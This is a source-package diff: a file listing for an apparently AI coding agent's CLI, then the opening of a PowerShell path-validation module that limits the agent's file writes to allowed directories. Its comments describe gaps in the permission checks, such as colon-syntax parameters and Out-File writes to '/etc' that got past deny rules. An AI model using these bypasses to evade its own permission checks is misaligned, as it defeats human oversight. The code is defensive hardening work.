  1555. package/src/utils/hooks/hooksConfigManager.ts +400 -0
  1556. package/src/utils/hooks/hooksConfigSnapshot.ts +133 -0
  1557. package/src/utils/hooks/hooksSettings.ts +271 -0
  1558. package/src/utils/hooks/postSamplingHooks.ts +70 -0
  1559. package/src/utils/hooks/registerFrontmatterHooks.ts +67 -0
  1560. package/src/utils/hooks/registerSkillHooks.ts +64 -0
  1561. package/src/utils/hooks/sessionHooks.ts +447 -0
  1562. package/src/utils/hooks/skillImprovement.ts +267 -0
  1563. package/src/utils/hooks/ssrfGuard.ts +294 -0
  1564. package/src/utils/hooks.ts +5022 -0
  1565. package/src/utils/horizontalScroll.ts +137 -0
  1566. package/src/utils/http.ts +136 -0
  1567. package/src/utils/hyperlink.ts +39 -0
  1568. package/src/utils/iTermBackup.ts +73 -0
  1569. package/src/utils/ide.ts +1494 -0
  1570. package/src/utils/idePathConversion.ts +90 -0
  1571. package/src/utils/idleTimeout.ts +53 -0
  1572. package/src/utils/imagePaste.ts +416 -0
  1573. package/src/utils/imageResizer.ts +880 -0
  1574. package/src/utils/imageStore.ts +167 -0
  1575. package/src/utils/imageValidation.ts +104 -0
  1576. package/src/utils/immediateCommand.ts +15 -0
  1577. package/src/utils/inProcessTeammateHelpers.ts +102 -0
  1578. package/src/utils/ink.ts +26 -0
  1579. package/src/utils/intl.ts +94 -0
  1580. package/src/utils/jetbrains.ts +191 -0
  1581. package/src/utils/json.ts +277 -0
  1582. package/src/utils/jsonRead.ts +16 -0
  1583. package/src/utils/keyboardShortcuts.ts +14 -0
  1584. package/src/utils/lazySchema.ts +8 -0
  1585. package/src/utils/listSessionsImpl.ts +454 -0
  1586. package/src/utils/localInstaller.ts +162 -0
  1587. package/src/utils/lockfile.ts +43 -0
  1588. package/src/utils/log.ts +362 -0
  1589. package/src/utils/logoV2Utils.ts +350 -0
  1590. package/src/utils/mailbox.ts +73 -0
  1591. package/src/utils/managedEnv.ts +199 -0
  1592. package/src/utils/managedEnvConstants.ts +191 -0
  1593. package/src/utils/markdown.ts +381 -0
  1594. package/src/utils/markdownConfigLoader.ts +600 -0
  1595. package/src/utils/mcp/dateTimeParser.ts +121 -0
  1596. package/src/utils/mcp/elicitationValidation.ts +336 -0
  1597. package/src/utils/mcpInstructionsDelta.ts +130 -0
  1598. package/src/utils/mcpOutputStorage.ts +189 -0
  1599. package/src/utils/mcpValidation.ts +208 -0
  1600. package/src/utils/mcpWebSocketTransport.ts +200 -0
  1601. package/src/utils/memoize.ts +269 -0
  1602. package/src/utils/memory/types.ts +12 -0
  1603. package/src/utils/memory/versions.ts +8 -0
  1604. package/src/utils/memoryFileDetection.ts +289 -0
  1605. package/src/utils/messagePredicates.ts +8 -0
  1606. package/src/utils/messageQueueManager.ts +547 -0
  1607. package/src/utils/messages/mappers.ts +290 -0
  1608. package/src/utils/messages/systemInit.ts +96 -0
  1609. package/src/utils/messages.ts +5512 -0
  1610. package/src/utils/model/agent.ts +157 -0
  1611. package/src/utils/model/aliases.ts +25 -0
  1612. package/src/utils/model/antModels.ts +64 -0
  1613. package/src/utils/model/bedrock.ts +265 -0
  1614. package/src/utils/model/check1mAccess.ts +72 -0
  1615. package/src/utils/model/configs.ts +118 -0
  1616. package/src/utils/model/contextWindowUpgradeCheck.ts +47 -0
  1617. package/src/utils/model/deprecation.ts +101 -0
  1618. package/src/utils/model/model.ts +634 -0
  1619. package/src/utils/model/modelAllowlist.ts +170 -0
  1620. package/src/utils/model/modelCapabilities.ts +118 -0
  1621. package/src/utils/model/modelOptions.ts +540 -0
  1622. package/src/utils/model/modelStrings.ts +166 -0
  1623. package/src/utils/model/modelSupportOverrides.ts +50 -0
  1624. package/src/utils/model/providers.ts +46 -0
  1625. package/src/utils/model/validateModel.ts +159 -0
  1626. package/src/utils/modelCost.ts +235 -0
  1627. package/src/utils/modifiers.ts +36 -0
  1628. package/src/utils/mtls.ts +179 -0
  1629. package/src/utils/nativeInstaller/download.ts +523 -0
  1630. package/src/utils/nativeInstaller/index.ts +18 -0
  1631. package/src/utils/nativeInstaller/installer.ts +1708 -0
  1632. package/src/utils/nativeInstaller/packageManagers.ts +336 -0
  1633. package/src/utils/nativeInstaller/pidLock.ts +433 -0
  1634. package/src/utils/notebook.ts +224 -0
  1635. package/src/utils/objectGroupBy.ts +18 -0
  1636. package/src/utils/pasteStore.ts +104 -0
  1637. package/src/utils/path.ts +155 -0
  1638. package/src/utils/pdf.ts +300 -0
  1639. package/src/utils/pdfUtils.ts +70 -0
  1640. package/src/utils/peerAddress.ts +21 -0
  1641. package/src/utils/permissions/PermissionMode.ts +141 -0
  1642. package/src/utils/permissions/PermissionPromptToolResultSchema.ts +127 -0
  1643. package/src/utils/permissions/PermissionResult.ts +35 -0
  1644. package/src/utils/permissions/PermissionRule.ts +40 -0
  1645. package/src/utils/permissions/PermissionUpdate.ts +389 -0
  1646. package/src/utils/permissions/PermissionUpdateSchema.ts +78 -0
  1647. package/src/utils/permissions/autoModeState.ts +39 -0
  1648. package/src/utils/permissions/bashClassifier.ts +61 -0
  1649. package/src/utils/permissions/bypassPermissionsKillswitch.ts +155 -0
  1650. package/src/utils/permissions/classifierDecision.ts +98 -0
  1651. package/src/utils/permissions/classifierShared.ts +39 -0
  1652. package/src/utils/permissions/dangerousPatterns.ts +80 -0
  1653. package/src/utils/permissions/denialTracking.ts +45 -0
  1654. package/src/utils/permissions/filesystem.ts +1777 -0
  1655. package/src/utils/permissions/getNextPermissionMode.ts +101 -0
  1656. package/src/utils/permissions/pathValidation.ts +485 -0
  1657. package/src/utils/permissions/permissionExplainer.ts +250 -0
  1658. package/src/utils/permissions/permissionRuleParser.ts +198 -0
  1659. package/src/utils/permissions/permissionSetup.ts +1532 -0
  1660. package/src/utils/permissions/permissions.ts +1486 -0
  1661. package/src/utils/permissions/permissionsLoader.ts +296 -0
  1662. package/src/utils/permissions/shadowedRuleDetection.ts +234 -0
  1663. package/src/utils/permissions/shellRuleMatching.ts +228 -0
  1664. package/src/utils/permissions/yoloClassifier.ts +1495 -0
  1665. package/src/utils/planModeV2.ts +95 -0
  1666. package/src/utils/plans.ts +397 -0
  1667. package/src/utils/platform.ts +150 -0
  1668. package/src/utils/plugins/addDirPluginSettings.ts +71 -0
  1669. package/src/utils/plugins/cacheUtils.ts +196 -0
  1670. package/src/utils/plugins/dependencyResolver.ts +305 -0
  1671. package/src/utils/plugins/fetchTelemetry.ts +135 -0
  1672. package/src/utils/plugins/gitAvailability.ts +69 -0
  1673. package/src/utils/plugins/headlessPluginInstall.ts +174 -0
  1674. package/src/utils/plugins/hintRecommendation.ts +164 -0
  1675. package/src/utils/plugins/installCounts.ts +292 -0
  1676. package/src/utils/plugins/installedPluginsManager.ts +1268 -0
  1677. package/src/utils/plugins/loadPluginAgents.ts +348 -0
  1678. package/src/utils/plugins/loadPluginCommands.ts +946 -0
  1679. package/src/utils/plugins/loadPluginHooks.ts +287 -0
  1680. package/src/utils/plugins/loadPluginOutputStyles.ts +178 -0
  1681. package/src/utils/plugins/lspPluginIntegration.ts +387 -0
  1682. package/src/utils/plugins/lspRecommendation.ts +374 -0
  1683. package/src/utils/plugins/managedPlugins.ts +27 -0
  1684. package/src/utils/plugins/marketplaceHelpers.ts +592 -0
  1685. package/src/utils/plugins/marketplaceManager.ts +2643 -0
  1686. package/src/utils/plugins/mcpPluginIntegration.ts +634 -0
  1687. package/src/utils/plugins/mcpbHandler.ts +968 -0
  1688. package/src/utils/plugins/officialMarketplace.ts +25 -0
  1689. package/src/utils/plugins/officialMarketplaceGcs.ts +216 -0
  1690. package/src/utils/plugins/officialMarketplaceStartupCheck.ts +439 -0
  1691. package/src/utils/plugins/orphanedPluginFilter.ts +114 -0
  1692. package/src/utils/plugins/parseMarketplaceInput.ts +162 -0
  1693. package/src/utils/plugins/performStartupChecks.tsx +70 -0
  1694. package/src/utils/plugins/pluginAutoupdate.ts +284 -0
  1695. package/src/utils/plugins/pluginBlocklist.ts +127 -0
  1696. package/src/utils/plugins/pluginDirectories.ts +178 -0
  1697. package/src/utils/plugins/pluginFlagging.ts +208 -0
  1698. package/src/utils/plugins/pluginIdentifier.ts +123 -0
  1699. package/src/utils/plugins/pluginInstallationHelpers.ts +595 -0
  1700. package/src/utils/plugins/pluginLoader.ts +3302 -0
  1701. package/src/utils/plugins/pluginOptionsStorage.ts +400 -0
  1702. package/src/utils/plugins/pluginPolicy.ts +20 -0
  1703. package/src/utils/plugins/pluginStartupCheck.ts +341 -0
  1704. package/src/utils/plugins/pluginVersioning.ts +157 -0
  1705. package/src/utils/plugins/reconciler.ts +265 -0
  1706. package/src/utils/plugins/refresh.ts +215 -0
  1707. package/src/utils/plugins/schemas.ts +1681 -0
  1708. package/src/utils/plugins/validatePlugin.ts +903 -0
  1709. package/src/utils/plugins/walkPluginMarkdown.ts +69 -0
  1710. package/src/utils/plugins/zipCache.ts +406 -0
  1711. package/src/utils/plugins/zipCacheAdapters.ts +164 -0
  1712. package/src/utils/powershell/dangerousCmdlets.ts +185 -0
  1713. package/src/utils/powershell/parser.ts +1804 -0
  1714. package/src/utils/powershell/staticPrefix.ts +316 -0
  1715. package/src/utils/preflightChecks.tsx +151 -0
  1716. package/src/utils/privacyLevel.ts +55 -0
  1717. package/src/utils/process.ts +68 -0
  1718. package/src/utils/processUserInput/processBashCommand.tsx +140 -0
  1719. package/src/utils/processUserInput/processSlashCommand.tsx +922 -0
  1720. package/src/utils/processUserInput/processTextPrompt.ts +100 -0
  1721. package/src/utils/processUserInput/processUserInput.ts +605 -0
  1722. package/src/utils/profilerBase.ts +46 -0
  1723. package/src/utils/promptCategory.ts +49 -0
  1724. package/src/utils/promptEditor.ts +188 -0
  1725. package/src/utils/promptShellExecution.ts +183 -0
  1726. package/src/utils/proxy.ts +426 -0
  1727. package/src/utils/queryContext.ts +179 -0
  1728. package/src/utils/queryHelpers.ts +552 -0
  1729. package/src/utils/queryProfiler.ts +301 -0
  1730. package/src/utils/queueProcessor.ts +95 -0
  1731. package/src/utils/readEditContext.ts +227 -0
  1732. package/src/utils/readFileInRange.ts +383 -0
  1733. package/src/utils/releaseNotes.ts +360 -0
  1734. package/src/utils/renderOptions.ts +77 -0
  1735. package/src/utils/ripgrep.ts +679 -0
  1736. package/src/utils/sandbox/sandbox-adapter.ts +985 -0
  1737. package/src/utils/sandbox/sandbox-ui-utils.ts +12 -0
  1738. package/src/utils/sanitization.ts +91 -0
  1739. package/src/utils/screenshotClipboard.ts +121 -0
  1740. package/src/utils/sdkEventQueue.ts +134 -0
  1741. package/src/utils/secureStorage/fallbackStorage.ts +70 -0
  1742. package/src/utils/secureStorage/index.ts +17 -0
  1743. package/src/utils/secureStorage/keychainPrefetch.ts +116 -0
  1744. package/src/utils/secureStorage/macOsKeychainHelpers.ts +111 -0
  1745. package/src/utils/secureStorage/macOsKeychainStorage.ts +231 -0
  1746. package/src/utils/secureStorage/plainTextStorage.ts +84 -0
  1747. package/src/utils/semanticBoolean.ts +29 -0
  1748. package/src/utils/semanticNumber.ts +36 -0
  1749. package/src/utils/semver.ts +59 -0
  1750. package/src/utils/sequential.ts +56 -0
  1751. package/src/utils/sessionActivity.ts +133 -0
  1752. package/src/utils/sessionEnvVars.ts +22 -0
  1753. package/src/utils/sessionEnvironment.ts +166 -0
  1754. package/src/utils/sessionFileAccessHooks.ts +250 -0
  1755. package/src/utils/sessionIngressAuth.ts +140 -0
  1756. package/src/utils/sessionRestore.ts +551 -0
  1757. package/src/utils/sessionStart.ts +232 -0
  1758. package/src/utils/sessionState.ts +150 -0
  1759. package/src/utils/sessionStorage.ts +5105 -0
  1760. package/src/utils/sessionStoragePortable.ts +793 -0
  1761. package/src/utils/sessionTitle.ts +129 -0
  1762. package/src/utils/sessionUrl.ts +64 -0
  1763. package/src/utils/set.ts +53 -0
  1764. package/src/utils/settings/allErrors.ts +32 -0
  1765. package/src/utils/settings/applySettingsChange.ts +92 -0
  1766. package/src/utils/settings/changeDetector.ts +488 -0
  1767. package/src/utils/settings/constants.ts +202 -0
  1768. package/src/utils/settings/internalWrites.ts +37 -0
  1769. package/src/utils/settings/managedPath.ts +34 -0
  1770. package/src/utils/settings/mdm/constants.ts +81 -0
  1771. package/src/utils/settings/mdm/rawRead.ts +130 -0
  1772. package/src/utils/settings/mdm/settings.ts +316 -0
  1773. package/src/utils/settings/permissionValidation.ts +262 -0
  1774. package/src/utils/settings/pluginOnlyPolicy.ts +60 -0
  1775. package/src/utils/settings/schemaOutput.ts +8 -0
  1776. package/src/utils/settings/settings.ts +1015 -0
  1777. package/src/utils/settings/settingsCache.ts +80 -0
  1778. package/src/utils/settings/toolValidationConfig.ts +103 -0
  1779. package/src/utils/settings/types.ts +1148 -0
  1780. package/src/utils/settings/validateEditTool.ts +45 -0
  1781. package/src/utils/settings/validation.ts +265 -0
  1782. package/src/utils/settings/validationTips.ts +164 -0
  1783. package/src/utils/shell/bashProvider.ts +255 -0
  1784. package/src/utils/shell/outputLimits.ts +14 -0
  1785. package/src/utils/shell/powershellDetection.ts +107 -0
  1786. package/src/utils/shell/powershellProvider.ts +123 -0
  1787. package/src/utils/shell/prefix.ts +367 -0
  1788. package/src/utils/shell/readOnlyCommandValidation.ts +1893 -0
  1789. package/src/utils/shell/resolveDefaultShell.ts +14 -0
  1790. package/src/utils/shell/shellProvider.ts +33 -0
  1791. package/src/utils/shell/shellToolUtils.ts +22 -0
  1792. package/src/utils/shell/specPrefix.ts +241 -0
  1793. package/src/utils/shellConfig.ts +167 -0
  1794. package/src/utils/sideQuery.ts +222 -0
  1795. package/src/utils/sideQuestion.ts +155 -0
  1796. package/src/utils/signal.ts +43 -0
  1797. package/src/utils/sinks.ts +16 -0
  1798. package/src/utils/skills/skillChangeDetector.ts +311 -0
  1799. package/src/utils/slashCommandParsing.ts +60 -0
  1800. package/src/utils/sleep.ts +84 -0
  1801. package/src/utils/sliceAnsi.ts +91 -0
  1802. package/src/utils/slowOperations.ts +286 -0
  1803. package/src/utils/standaloneAgent.ts +23 -0
  1804. package/src/utils/startupProfiler.ts +194 -0
  1805. package/src/utils/staticRender.tsx +116 -0
  1806. package/src/utils/stats.ts +1061 -0
  1807. package/src/utils/statsCache.ts +434 -0
  1808. package/src/utils/status.tsx +362 -0
  1809. package/src/utils/statusNoticeDefinitions.tsx +198 -0
  1810. package/src/utils/statusNoticeHelpers.ts +20 -0
  1811. package/src/utils/stream.ts +76 -0
  1812. package/src/utils/streamJsonStdoutGuard.ts +123 -0
  1813. package/src/utils/streamlinedTransform.ts +201 -0
  1814. package/src/utils/stringUtils.ts +235 -0
  1815. package/src/utils/subprocessEnv.ts +99 -0
  1816. package/src/utils/suggestions/commandSuggestions.ts +567 -0
  1817. package/src/utils/suggestions/directoryCompletion.ts +263 -0
  1818. package/src/utils/suggestions/shellHistoryCompletion.ts +119 -0
  1819. package/src/utils/suggestions/skillUsageTracking.ts +55 -0
  1820. package/src/utils/suggestions/slackChannelSuggestions.ts +209 -0
  1821. package/src/utils/swarm/It2SetupPrompt.tsx +380 -0
  1822. package/src/utils/swarm/backends/ITermBackend.ts +370 -0
  1823. package/src/utils/swarm/backends/InProcessBackend.ts +339 -0
  1824. package/src/utils/swarm/backends/PaneBackendExecutor.ts +354 -0
  1825. package/src/utils/swarm/backends/TmuxBackend.ts +764 -0
  1826. package/src/utils/swarm/backends/detection.ts +128 -0
  1827. package/src/utils/swarm/backends/it2Setup.ts +245 -0
  1828. package/src/utils/swarm/backends/registry.ts +464 -0
  1829. package/src/utils/swarm/backends/teammateModeSnapshot.ts +87 -0
  1830. package/src/utils/swarm/backends/types.ts +311 -0
  1831. package/src/utils/swarm/constants.ts +33 -0
  1832. package/src/utils/swarm/inProcessRunner.ts +1552 -0
  1833. package/src/utils/swarm/leaderPermissionBridge.ts +54 -0
  1834. package/src/utils/swarm/permissionSync.ts +928 -0
  1835. package/src/utils/swarm/reconnection.ts +119 -0
  1836. package/src/utils/swarm/spawnInProcess.ts +328 -0
  1837. package/src/utils/swarm/spawnUtils.ts +146 -0
  1838. package/src/utils/swarm/teamHelpers.ts +683 -0
  1839. package/src/utils/swarm/teammateInit.ts +129 -0
  1840. package/src/utils/swarm/teammateLayoutManager.ts +107 -0
  1841. package/src/utils/swarm/teammateModel.ts +10 -0
  1842. package/src/utils/swarm/teammatePromptAddendum.ts +18 -0
  1843. package/src/utils/systemDirectories.ts +74 -0
  1844. package/src/utils/systemPrompt.ts +123 -0
  1845. package/src/utils/systemPromptType.ts +14 -0
  1846. package/src/utils/systemTheme.ts +119 -0
  1847. package/src/utils/taggedId.ts +54 -0
  1848. package/src/utils/task/TaskOutput.ts +390 -0
  1849. package/src/utils/task/diskOutput.ts +451 -0
  1850. package/src/utils/task/framework.ts +308 -0
  1851. package/src/utils/task/outputFormatting.ts +38 -0
  1852. package/src/utils/task/sdkProgress.ts +36 -0
  1853. package/src/utils/tasks.ts +862 -0
  1854. package/src/utils/teamDiscovery.ts +81 -0
  1855. package/src/utils/teamMemoryOps.ts +88 -0
  1856. package/src/utils/teammate.ts +292 -0
  1857. package/src/utils/teammateContext.ts +96 -0
  1858. package/src/utils/teammateMailbox.ts +1183 -0
  1859. package/src/utils/telemetry/betaSessionTracing.ts +491 -0
  1860. package/src/utils/telemetry/bigqueryExporter.ts +252 -0
  1861. package/src/utils/telemetry/events.ts +75 -0
  1862. package/src/utils/telemetry/instrumentation.ts +825 -0
  1863. package/src/utils/telemetry/logger.ts +26 -0
  1864. package/src/utils/telemetry/perfettoTracing.ts +1120 -0
  1865. package/src/utils/telemetry/pluginTelemetry.ts +289 -0
  1866. package/src/utils/telemetry/sessionTracing.ts +927 -0
  1867. package/src/utils/telemetry/skillLoadedEvent.ts +39 -0
  1868. package/src/utils/telemetryAttributes.ts +71 -0
  1869. package/src/utils/teleport/api.ts +466 -0
  1870. package/src/utils/teleport/environmentSelection.ts +77 -0
  1871. package/src/utils/teleport/environments.ts +120 -0
  1872. package/src/utils/teleport/gitBundle.ts +292 -0
  1873. package/src/utils/teleport.tsx +1226 -0
  1874. package/src/utils/tempfile.ts +31 -0
  1875. package/src/utils/terminal.ts +131 -0
  1876. package/src/utils/terminalPanel.ts +191 -0
  1877. package/src/utils/textHighlighting.ts +166 -0
  1878. package/src/utils/theme.ts +639 -0
  1879. package/src/utils/thinking.ts +162 -0
  1880. package/src/utils/timeouts.ts +39 -0
  1881. package/src/utils/tmuxSocket.ts +427 -0
  1882. package/src/utils/todo/types.ts +18 -0
  1883. package/src/utils/tokenBudget.ts +73 -0
  1884. package/src/utils/tokens.ts +261 -0
  1885. package/src/utils/toolErrors.ts +132 -0
  1886. package/src/utils/toolPool.ts +79 -0
  1887. package/src/utils/toolResultStorage.ts +1040 -0
  1888. package/src/utils/toolSchemaCache.ts +26 -0
  1889. package/src/utils/toolSearch.ts +756 -0
  1890. package/src/utils/transcriptSearch.ts +202 -0
  1891. package/src/utils/treeify.ts +170 -0
  1892. package/src/utils/truncate.ts +179 -0
  1893. package/src/utils/ultraplan/ccrSession.ts +349 -0
  1894. package/src/utils/ultraplan/keyword.ts +127 -0
  1895. package/src/utils/ultraplan/prompt.txt +1 -0
  1896. package/src/utils/unaryLogging.ts +39 -0
  1897. package/src/utils/undercover.ts +89 -0
  1898. package/src/utils/user.ts +194 -0
  1899. package/src/utils/userAgent.ts +10 -0
  1900. package/src/utils/userPromptKeywords.ts +27 -0
  1901. package/src/utils/uuid.ts +27 -0
  1902. package/src/utils/warningHandler.ts +121 -0
  1903. package/src/utils/which.ts +82 -0
  1904. package/src/utils/windowsPaths.ts +173 -0
  1905. package/src/utils/withResolvers.ts +13 -0
  1906. package/src/utils/words.ts +800 -0
  1907. package/src/utils/workloadContext.ts +57 -0
  1908. package/src/utils/worktree.ts +1519 -0
  1909. package/src/utils/worktreeModeEnabled.ts +11 -0
  1910. package/src/utils/xdg.ts +65 -0
  1911. package/src/utils/xml.ts +16 -0
  1912. package/src/utils/yaml.ts +15 -0
  1913. package/src/utils/zodToJsonSchema.ts +23 -0
  1914. package/src/vim/motions.ts +82 -0
  1915. package/src/vim/operators.ts +556 -0
  1916. package/src/vim/textObjects.ts +186 -0
  1917. package/src/vim/transitions.ts +490 -0
  1918. package/src/vim/types.ts +199 -0
  1919. package/src/voice/voiceModeEnabled.ts +54 -0
  1920. package/start.js +1 -0
@@ -0,0 +1,2049 @@
1
+ /**
2
+ * PowerShell-specific path validation for command arguments.
3
+ *
4
+ * Extracts file paths from PowerShell commands using the AST parser
5
+ * and validates they stay within allowed project directories.
6
+ * Follows the same patterns as BashTool/pathValidation.ts.
7
+ */
8
+
9
+ import { homedir } from 'os'
10
+ import { isAbsolute, resolve } from 'path'
11
+ import type { ToolPermissionContext } from '../../Tool.js'
12
+ import type { PermissionRule } from '../../types/permissions.js'
13
+ import { getCwd } from '../../utils/cwd.js'
14
+ import {
15
+ getFsImplementation,
16
+ safeResolvePath,
17
+ } from '../../utils/fsOperations.js'
18
+ import { containsPathTraversal, getDirectoryForPath } from '../../utils/path.js'
19
+ import {
20
+ allWorkingDirectories,
21
+ checkEditableInternalPath,
22
+ checkPathSafetyForAutoEdit,
23
+ checkReadableInternalPath,
24
+ matchingRuleForInput,
25
+ pathInAllowedWorkingPath,
26
+ } from '../../utils/permissions/filesystem.js'
27
+ import type { PermissionResult } from '../../utils/permissions/PermissionResult.js'
28
+ import { createReadRuleSuggestion } from '../../utils/permissions/PermissionUpdate.js'
29
+ import type { PermissionUpdate } from '../../utils/permissions/PermissionUpdateSchema.js'
30
+ import {
31
+ isDangerousRemovalPath,
32
+ isPathInSandboxWriteAllowlist,
33
+ } from '../../utils/permissions/pathValidation.js'
34
+ import { getPlatform } from '../../utils/platform.js'
35
+ import type {
36
+ ParsedCommandElement,
37
+ ParsedPowerShellCommand,
38
+ } from '../../utils/powershell/parser.js'
39
+ import {
40
+ isNullRedirectionTarget,
41
+ isPowerShellParameter,
42
+ } from '../../utils/powershell/parser.js'
43
+ import { COMMON_SWITCHES, COMMON_VALUE_PARAMS } from './commonParameters.js'
44
+ import { resolveToCanonical } from './readOnlyValidation.js'
45
+
46
+ const MAX_DIRS_TO_LIST = 5
47
+ // PowerShell wildcards are only * ? [ ] — braces are LITERAL characters
48
+ // (no brace expansion). Including {} mis-routed paths like `./{x}/passwd`
49
+ // through glob-base truncation instead of full-path symlink resolution.
50
+ const GLOB_PATTERN_REGEX = /[*?[\]]/
51
+
52
+ type FileOperationType = 'read' | 'write' | 'create'
53
+
54
+ type PathCheckResult = {
55
+ allowed: boolean
56
+ decisionReason?: import('../../utils/permissions/PermissionResult.js').PermissionDecisionReason
57
+ }
58
+
59
+ type ResolvedPathCheckResult = PathCheckResult & {
60
+ resolvedPath: string
61
+ }
62
+
63
+ /**
64
+ * Per-cmdlet parameter configuration.
65
+ *
66
+ * Each entry declares:
67
+ * - operationType: whether this cmdlet reads or writes to the filesystem
68
+ * - pathParams: parameters that accept file paths (validated against allowed directories)
69
+ * - knownSwitches: switch parameters (take NO value) — next arg is NOT consumed
70
+ * - knownValueParams: value-taking parameters that are NOT paths — next arg IS consumed
71
+ * but NOT validated as a path (e.g., -Encoding UTF8, -Filter *.txt)
72
+ *
73
+ * SECURITY MODEL: Any -Param NOT in one of these three sets forces
74
+ * hasUnvalidatablePathArg → ask. This ends the KNOWN_SWITCH_PARAMS whack-a-mole
75
+ * where every missing switch caused the unknown-param heuristic to swallow the
76
+ * next arg (potentially the positional path). Now, Tier 2 cmdlets only auto-allow
77
+ * with invocations we fully understand.
78
+ *
79
+ * Sources:
80
+ * - (Get-Command <cmdlet>).Parameters on Windows PowerShell 5.1
81
+ * - PS 6+ additions from official docs (e.g., -AsByteStream, -NoEmphasis)
82
+ *
83
+ * NOTE: Common parameters (-Verbose, -ErrorAction, etc.) are NOT listed here;
84
+ * they are merged in from COMMON_SWITCHES / COMMON_VALUE_PARAMS at lookup time.
85
+ *
86
+ * Parameter names are lowercase with leading dash to match runtime comparison.
87
+ */
88
+ type CmdletPathConfig = {
89
+ operationType: FileOperationType
90
+ /** Parameter names that accept file paths (validated against allowed directories) */
91
+ pathParams: string[]
92
+ /** Switch parameters that take no value (next arg is NOT consumed) */
93
+ knownSwitches: string[]
94
+ /** Value-taking parameters that are not paths (next arg IS consumed, not path-validated) */
95
+ knownValueParams: string[]
96
+ /**
97
+ * Parameter names that accept a leaf filename resolved by PowerShell
98
+ * relative to ANOTHER parameter (not cwd). Safe to extract only when the
99
+ * value is a simple leaf (no `/`, `\`, `.`, `..`). Non-leaf values are
100
+ * flagged as unvalidatable because validatePath resolves against cwd, not
101
+ * the actual base — joining against -Path would need cross-parameter
102
+ * tracking.
103
+ */
104
+ leafOnlyPathParams?: string[]
105
+ /**
106
+ * Number of leading positional arguments to skip (NOT extracted as paths).
107
+ * Used for cmdlets where positional-0 is a non-path value — e.g.,
108
+ * Invoke-WebRequest's positional -Uri is a URL, not a local filesystem path.
109
+ * Without this, `iwr http://example.com` extracts `http://example.com` as
110
+ * a path, and validatePath's provider-path regex (^[a-z]{2,}:) misfires on
111
+ * the URL scheme with a confusing "non-filesystem provider" message.
112
+ */
113
+ positionalSkip?: number
114
+ /**
115
+ * When true, this cmdlet only writes to disk when a pathParam is present.
116
+ * Without a path (e.g., `Invoke-WebRequest https://example.com` with no
117
+ * -OutFile), it's effectively a read operation — output goes to the pipeline,
118
+ * not the filesystem. Skips the "write with no target path" forced-ask.
119
+ * Cmdlets like Set-Content that ALWAYS write should NOT set this.
120
+ */
121
+ optionalWrite?: boolean
122
+ }
123
+
124
+ const CMDLET_PATH_CONFIG: Record<string, CmdletPathConfig> = {
125
+ // ─── Write/create operations ──────────────────────────────────────────────
126
+ 'set-content': {
127
+ operationType: 'write',
128
+ // -PSPath and -LP are runtime aliases for -LiteralPath on all provider
129
+ // cmdlets. Without them, colon syntax (-PSPath:/etc/x) falls to the
130
+ // unknown-param branch → path trapped → paths=[] → deny never consulted.
131
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
132
+ knownSwitches: [
133
+ '-passthru',
134
+ '-force',
135
+ '-whatif',
136
+ '-confirm',
137
+ '-usetransaction',
138
+ '-nonewline',
139
+ '-asbytestream', // PS 6+
140
+ ],
141
+ knownValueParams: [
142
+ '-value',
143
+ '-filter',
144
+ '-include',
145
+ '-exclude',
146
+ '-credential',
147
+ '-encoding',
148
+ '-stream',
149
+ ],
150
+ },
151
+ 'add-content': {
152
+ operationType: 'write',
153
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
154
+ knownSwitches: [
155
+ '-passthru',
156
+ '-force',
157
+ '-whatif',
158
+ '-confirm',
159
+ '-usetransaction',
160
+ '-nonewline',
161
+ '-asbytestream', // PS 6+
162
+ ],
163
+ knownValueParams: [
164
+ '-value',
165
+ '-filter',
166
+ '-include',
167
+ '-exclude',
168
+ '-credential',
169
+ '-encoding',
170
+ '-stream',
171
+ ],
172
+ },
173
+ 'remove-item': {
174
+ operationType: 'write',
175
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
176
+ knownSwitches: [
177
+ '-recurse',
178
+ '-force',
179
+ '-whatif',
180
+ '-confirm',
181
+ '-usetransaction',
182
+ ],
183
+ knownValueParams: [
184
+ '-filter',
185
+ '-include',
186
+ '-exclude',
187
+ '-credential',
188
+ '-stream',
189
+ ],
190
+ },
191
+ 'clear-content': {
192
+ operationType: 'write',
193
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
194
+ knownSwitches: ['-force', '-whatif', '-confirm', '-usetransaction'],
195
+ knownValueParams: [
196
+ '-filter',
197
+ '-include',
198
+ '-exclude',
199
+ '-credential',
200
+ '-stream',
201
+ ],
202
+ },
203
+ // Out-File/Tee-Object/Export-Csv/Export-Clixml were absent, so path-level
204
+ // deny rules (Edit(/etc/**)) hard-blocked `Set-Content /etc/x` but only
205
+ // *asked* for `Out-File /etc/x`. All four are write cmdlets that accept
206
+ // file paths positionally.
207
+ 'out-file': {
208
+ operationType: 'write',
209
+ // Out-File uses -FilePath (position 0). -Path is PowerShell's documented
210
+ // ALIAS for -FilePath — must be in pathParams or `Out-File -Path:./x`
211
+ // (colon syntax, one token) falls to unknown-param → value trapped →
212
+ // paths=[] → Edit deny never consulted → ask (fail-safe but deny downgrade).
213
+ pathParams: ['-filepath', '-path', '-literalpath', '-pspath', '-lp'],
214
+ knownSwitches: [
215
+ '-append',
216
+ '-force',
217
+ '-noclobber',
218
+ '-nonewline',
219
+ '-whatif',
220
+ '-confirm',
221
+ ],
222
+ knownValueParams: ['-inputobject', '-encoding', '-width'],
223
+ },
224
+ 'tee-object': {
225
+ operationType: 'write',
226
+ // Tee-Object uses -FilePath (position 0, alias: -Path). -Variable NOT a path.
227
+ pathParams: ['-filepath', '-path', '-literalpath', '-pspath', '-lp'],
228
+ knownSwitches: ['-append'],
229
+ knownValueParams: ['-inputobject', '-variable', '-encoding'],
230
+ },
231
+ 'export-csv': {
232
+ operationType: 'write',
233
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
234
+ knownSwitches: [
235
+ '-append',
236
+ '-force',
237
+ '-noclobber',
238
+ '-notypeinformation',
239
+ '-includetypeinformation',
240
+ '-useculture',
241
+ '-noheader',
242
+ '-whatif',
243
+ '-confirm',
244
+ ],
245
+ knownValueParams: [
246
+ '-inputobject',
247
+ '-delimiter',
248
+ '-encoding',
249
+ '-quotefields',
250
+ '-usequotes',
251
+ ],
252
+ },
253
+ 'export-clixml': {
254
+ operationType: 'write',
255
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
256
+ knownSwitches: ['-force', '-noclobber', '-whatif', '-confirm'],
257
+ knownValueParams: ['-inputobject', '-depth', '-encoding'],
258
+ },
259
